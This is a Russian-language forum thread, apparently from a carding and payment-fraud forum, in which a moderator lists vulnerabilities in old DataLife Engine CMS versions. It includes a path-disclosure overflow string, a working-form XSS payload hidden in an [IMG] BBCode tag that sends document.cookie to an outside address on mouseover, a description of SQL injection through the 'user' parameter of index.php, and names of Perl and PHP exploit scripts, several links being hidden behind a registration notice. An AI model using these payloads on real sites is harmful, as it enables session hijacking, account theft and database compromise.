Заливы на карты - Платежные системы Обучение заливам на электронные кошельки и карты Карты с балансом - Купить карты с балансом
  1. Уважаемые посетители нашего форума. Ни в коем случае без проверки не проводите сделку с человеком, который предлагает услугу. Или используйте гаранта, либо если мы тему пропустили просите нас проверить его. И не забывайте зарегистрироваться на нашем форуме.
  2. Внимание. У нас изменились ns сервера домена. Некоторое время форум может у кого то не открываться. Все дело времени пока ваш провайдер не обновит свои днс сервера.
    Скрыть объявление

Уязвимость /datalife Engine/

Тема в разделе "Обзор уязвимостей DataLife Engine", создана пользователем Kven, 4 мар 2018.

  1. Автор темы
    Kven
    Offline

    Kven Модератор Команда форума Модератор Участник

    362
    51
    28
    Обзор уязвимостей [DataLife Engine]


    Сайт производителя: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Актуальная версия: 8.5

    DataLife Engine v.3.7


    [Раскрытие установочного пути]

    В parse.class.php выделено 12582912 байт на проверку сообщения.
    Переполнение делается так: "<<><><><><><>>"

    [ХСС]

    Угнать кукисы можно при помощи вставки картинки.
    -- этим можно воспользваться всегда, даже если нету таких кнопок при
    добавлении новости, личном сообщении, добавления коментария.
    Непосредственно сама ХСС:

    Code:
    [IMG=left]Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!" onmouseover='document.location=" class="fixed">Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!"+document.
    cookie;'><!--[/IMG]
    [Проблемы с SQL]

    Code:
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок! -- где topic -- это не существующая тема.
    Результат: SELECT id FROM nws_category WHERE parentid=not detected ;

    Версия 4.1 возможно более ранние SQL Injection.


    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

    Уязвимость существует из-за недостаточной обработки входных данных в параметре "user" в сценарии index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

    Code:
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Код:
    
    DataLife Engine <= 4.1 Remote SQL Injection Exploit (perl)
    DataLife Engine <= 4.1 Remote SQL Injection Exploit (php)
    SQL injection for <=4.1 version exploit
    RGdatalife - exploit (php version)